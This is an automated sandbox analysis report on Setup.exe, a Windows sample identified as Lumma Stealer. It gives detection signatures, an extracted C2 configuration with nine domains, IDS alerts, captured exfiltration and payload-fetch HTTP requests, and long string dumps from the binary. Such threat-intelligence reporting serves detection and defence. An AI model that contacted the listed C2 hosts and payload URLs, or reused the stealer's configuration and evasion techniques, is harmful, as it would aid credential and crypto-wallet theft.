
Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1584503
MD5: 2f84c8a115eb4fa477054b3915d6d156
SHA1: 0aa8a86694bf487867861c8d51919b558b62ef3c
SHA256: a13eeb5717208e256a8b59d7baa24754f0b81f9fa9d7e7a0cf60b07fc0e489dd
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 2F84C8A115EB4FA477054B3915D6D156)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC): {"C2 url": ["abruptyopsn.shop", "sloppymisskr.click", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--TRON"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x51ba7:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T17:54:15.384083+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.406362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:18.182604+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:19.620755+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:21.248372+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:24.192636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:25.189162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:27.191854+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:29.571028+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:30.792272+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
2025-01-05T17:54:15.895405+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.894231+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:30.024044+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:15.895405+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:16.894231+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:20.186521+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:27.196515+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 104.21.90.109 | 443 | TCP


              AV Detection

Source: https://cegu.shop:443/8574262446/ph.txt | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt/P | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtf1 | Avira URL Cloud: Label: malware
Source: https://cegu.shop/4Q | Avira URL Cloud: Label: malware
Source: https://cegu.shop/1B | Avira URL Cloud: Label: malware
Source: https://cegu.shop// | Avira URL Cloud: Label: malware
Source: Setup.exe.6860.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "sloppymisskr.click", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--TRON"}
Source: Setup.exe | ReversingLabs: Detection: 15%
Source: Setup.exe | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 81.7% probability
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: sloppymisskr.click
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--TRON
Source: Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49756 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 104.21.90.109:443
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: sloppymisskr.click
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Joe Sandbox View | IP Address: 185.161.251.21 185.161.251.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.90.109:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LZCUHPS6R | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18108 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=YDRKR53H0UXY5E | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8759 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UMY21CEW4IOI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20400 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LI1MZWAEHW | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7081 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7NCL0BD3V0SN8T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 942 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1T1XCH02CDNFYJ80Y | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 586961 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 113 | Host: sloppymisskr.click
Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
              Source: Setup.exeString found in binary or memory: ID: %sPlease copy and paste the page source code of the video that you want to download into this boxCXMediaGrabThreadCXMediaSubstreamDownloadThreadconcat-callback_context-callback_window-y-strict-fs%I64d-c-target-filter_complex-loopgif-hls_segment_filename-hls_list_size-lhls-preset-sn-codec:s-an-filter:avolume=%.2f-pre:a-profile:a-bsf:a-q:a-vol-b:a-ar-ac-tag:a-codec:a-vn-filter:vcolorchannelmixer=.393:.769:.189:0:.349:.686:.168:0:.272:.534:.131negatehue=s=0hflipvfliptranspose=1transpose=2,transpose=2transpose=2crop=w=%d:h=%d:x=%d:y=%dcrop=w=%d:h=%d,-pre:v-profile:v-bsf:v-vsync-frames:v-q:v-b:v-aspect-s-pix_fmt-tag:v-codec:v-map%d:%d-i"%s"-itsoffset-t-safe-f-ss-r%d/%d-bufsize-threads-hwaccellibfdk_aacaaccopydropaac_adtstoascconcat:image2animated-imagecaptionxwd_pipexbm_pipexpm_pipewebp_pipevbn_pipetiff_pipesunrast_pipesvg_pipesgi_pipeqoi_pipeqdraw_pipepsd_pipeppm_pipepng_pipepictor_pipephotocd_pipephm_pipepgx_pipepgm_pipepgmyuv_pipepfm_pipepcx_pipepbm_pipepam_pipejpegxl_pipejpegls_pipejpeg_pipej2k_pipegif_pipegem_pipeexr_pipedpx_pipedds_pipecri_pipebmp_pipeimage2_brender_piximage2_alias_piximage2pipeapngtextttyProfileCodecBitRate%s\avcodec-56.dll%s\avcodec-57.dll%s\avcodec-58.dll%s\avcodec-59.dll%s\avcodec-60.dllMediaPlay.exe%s\MediaPlay.exe\PresetsMediaEncode.exe%s\MediaEncode.exeMediaProbe.exe%s\MediaProbe.exe-probesize-analyzeduration-print_format-show_entries-count_frames-show_streams-show_format-loglevelquietDURATIONundlanguagedefaultdispositionchannelssample_ratesample_fmt%d:%dsample_aspect_ratior_frame_rateavg_frame_rateheightwidthpix_fmtnb_read_framesnb_frames%d/%dtime_basetrueis_avcsubtitleaudiovideocodec_typecodec_tag_stringprofilecodec_nameindexstreamsencodertagsprobe_scorebit_ratesizedurationstart_timeformat_namenb_programsnb_streamsformatjson@%s--nio-callback-context--nio-callback-window-#--parallel-max--parallel-immediate--parallel--dump-header--styled-output--retry--speed-time--speed-lim
it--connect-timeout--compressed--head--nio-local-pos--nio-local-allocated--output--range--location--data--header--cookie--referer--user-agent--proxy--http%s--insecure--cacertaccept-rangescontent-encodingcontent-lengthlocationbytesSet-Cookieset-cookieHTTP/Mozilla/5.0 (Windows NT 10; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0deflategzip1.2.5https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type: %sSec-Fetch-Mode: %sAccept-Encoding: %sAccept-Charset: %sAccept-Language: %sAccept: %sCHttpIOThread equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: ID: %shttps://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease enter one URL per linePlease enter at least one URL.You may enter an URL or ID. equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: TcUhTc8Tc0Tc_0.1MEDIA_CONNECT_FRONTENDmediaconnect2.0TVHTML5_SIMPLY_EMBEDDED_PLAYERtv_embedded7.20240724.13.00TVHTML5tv2.20240726.01.00MWEBmwebcom.google.ios.ytcreator/24.30.100 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)IOS_CREATORios_creatorcom.google.ios.youtubemusic/7.08.2 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)7.08.2IOS_MUSICAIzaSyBAETezhkwP0ZWA02RsqT1zu78Fpt0bC_sios_musiccom.google.ios.youtube/17.33.2 (iPhone14,3; U; CPU iOS 15_6 like Mac OS X)iPhone14,317.33.2IOS_MESSAGES_EXTENSIONios_embedded17.5.1.21F90iPhonecom.google.ios.youtube/19.29.1 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)iPhone16,219.29.1IOSAIzaSyB-63vPrdThhKuerbB2N_l7Kwwcxj6yUAcioscom.google.android.apps.youtube.producer/0.111.1 (Linux; U; Android 11) gzip0.111.1ANDROID_PRODUCERandroid_producer2AMBcom.google.android.youtube/1.9 (Linux; U; Android 11) gzip1.9ANDROID_TESTSUITEandroid_testsuite12Lcom.google.android.apps.youtube.vr.oculus/1.57.29 (Linux; U; Android 12L; eureka-user Build/SQ3A.220605.009.A1) gzipQuest 3Oculus1.57.29ANDROID_VRandroid_vrcom.google.android.apps.youtube.creator/24.30.100 (Linux; U; Android 11) gzip24.30.100ANDROID_CREATORAIzaSyD_qjV8zaaUMehtLkrKFgVeSX_Iqbtyws8android_creatorcom.google.android.apps.youtube.music/7.11.50 (Linux; U; Android 11) gzip7.11.50ANDROID_MUSICAIzaSyAOghZGza2MQSZkY_zfZ370N-PUdXEo8AIandroid_musiccom.google.android.youtube/17.31.35 (Linux; U; Android 11) gzip17.31.35ANDROID_EMBEDDED_PLAYERAIzaSyCjc_pVEDi4qsv5MtC2dMXzpIaDoRFLsxwandroid_embedded11com.google.android.youtube/19.29.37 (Linux; U; Android 11) gzip19.29.37ANDROIDAIzaSyA8eiZmM1FaDVjRy-df2KTyQ_vz_yYM39wandroid1.20240723.03.00WEB_CREATORAIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMoweb_creator1.20240724.00.00WEB_REMIXmusic.youtube.comAIzaSyC9XL3ZjWddXya6X74dJoCTL-WEYFDNX30web_music1.20240723.01.00WEB_EMBEDDED_PLAYERweb_embeddedMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 
Version/15.5 Safari/605.1.15,gzip(gfe)2.20240726.00.00web_safari2.20240910.03.00WEBAIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8webwww.youtube.comAIzaSyDCU8hByM-4DrUqRUYnGn-3llEO78bcxq8streamTypesgoap/gir%3Dyes%3Bitag%3Dsgovp/gir%3Dyes%3Bitag%3D equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: fc|fcpfcdfcXfcLfc@fc4fc(fcCgIQCQ==CgIQCA==CgIQBw==CgIQBg==CgIQBQ==CgIQBA==CgIQAw==CgIQAg==CgIQAQ==CgIQAA==https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Youtube-Client-Namegzip, deflateplaybackContextcontentPlaybackContexthtml5PreferenceHTML5_PREF_WANTScontextclientutcOffsetMinutestimeZoneUTChlenuserAgentdeviceModelandroidSdkVersionclientVersionclientNameracyCheckOkcontentCheckOkvideoIdhttps://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-IdcontinuationclickTrackingclickTrackingParamsuseSsluserlockedSafetyModeconfigInfoappInstallDataoriginalUrlacceptHeaderbrowserVersionbrowserNameplatformosVersionosNameclientFormFactordeviceExperimentIddeviceMakevisitorDataremoteHostglUSwgYCCAA=browseIdhttps://www.youtube.com/youtubei/v1/search?key=%s&prettyPrint=falseEgIQAQ==queryAccept-Encoding: identity equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManifestUrldashManifestUrladaptiveFormatsformatsdrmFamiliesencryptionapproxDurationMscontentLengthaverageBitrateaudioChannelsaudioSampleRateaudioQualityitagsspsspurlciphersignatureCiphercaptionsvideoDetailsstreamingData\u003d="originalUrl":"",https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.com/vi/%s/mqdefault.jpghttps://www.youtube.com/watch?v=%ssingleColumnBrowseResultsRenderertwoColumnBrowseResultsRenderercontentscontinuationContentsonResponseReceivedActionsrunsplaylistIdplaylistHeaderRendererheadercontinuationsplaylistVideoRendererplaylistVideoListRenderersectionListRenderercontenttabRenderertabssimpleTextcontinuationItemRendereritemSectionRenderercontinuationItemsappendContinuationItemsActionplaylistVideoListContinuationthumbnailstokencontinuationCommandcontinuationEndpointnextContinuationDatahttps://www.youtube.com/embed/%s?autoplay=1&rel=0publishedTimeTextownerTextviewCountTextlengthTextlabelaccessibilityDataaccessibilityvshelfRendererreelShelfRenderersearchPyvRenderervideoRendererprimaryContentsreloadContinuationDataelementRenderercompactVideoRenderersectionListContinuationtwoColumnSearchResultsRendereronResponseReceivedCommandsestimatedResults272138https://video.google.com/timedtext?hl=en&type=list&v=%shttps://www.youtube.com/api/timedtext?type=%s&name=%s&fmt=%s&lang=%s&v=%slang_translatedlang_originallang_codenametracktranscript_list18LOGIN_REQUIREDUNPLAYABLEERRORstatushttps://www.youtube.com/results?search_query=%s&page=%dwindow["ytInitialData"]var ytInitialData 
="sectionListRenderer":YouTubeytimg.comyoutu.beytcfg.setyoutube-nocookie.comindex=video_ids=/user//vi/ytimg.youtu.be//clip//live//shorts/v=list=p=/channel/youtube.com/shorts/youtube-nocookie.com/embed/youtube.com/embed//watch?v=youtube.com/v/video_idyoutube.VISITOR_INFO1_LIVEYSCGPShl=%s&tz=%sUTCPREFPENDING+CONSENTSOCS__Secure-3PSIDYES+cb.20210328-17-p0.en+FX+%dPREF=%s; CONSENT=%sPREF=%sPREF=%s; CONSENT=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%sPREF=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%s&ratebypass=yesratebypass=yesratebypassn= equals www.youtube.com (Youtube)
              Source: Setup.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" 
